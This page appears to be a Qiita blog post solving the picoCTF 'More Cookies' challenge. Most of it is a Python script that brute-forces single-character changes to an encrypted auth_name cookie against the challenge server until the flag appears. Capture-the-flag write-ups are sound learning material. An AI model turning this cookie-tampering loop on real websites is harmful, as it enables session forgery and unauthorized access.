LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

@rudy_candy

picoCTF Writeup picoGym Practice Challenges More Cookies (注意<spoiler>)

Posted at

More Cookies

Description
I forgot Cookies can Be modified Client-side, so now I decided to encrypt them! http://mercury.picoctf.net:10868/

solved.py
import requests
import string

candidates = string.ascii_letters + string.digits + '+/'
url = 'http://mercury.picoctf.net:10868/'

flag_format = 'picoCTF{'

def attack(cookie):
    cookies = {'auth_name': cookie}
    res = requests.get(url, cookies=cookies)
    #print(res.text)
    if flag_format in res.text:
        print(cookie)
        print(res.text)
        return True
    return False

while True:
    s = requests.session()
    res = s.get(url)
    cookie = s.cookies.get('auth_name')
    print(cookie)
    for i in range(len(cookie)):
        print(i)
        for c in candidates:
            chall = cookie[:i] + c + cookie[i+1:]
            #print(chall)
            if (attack(chall)):
                exit(0)
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?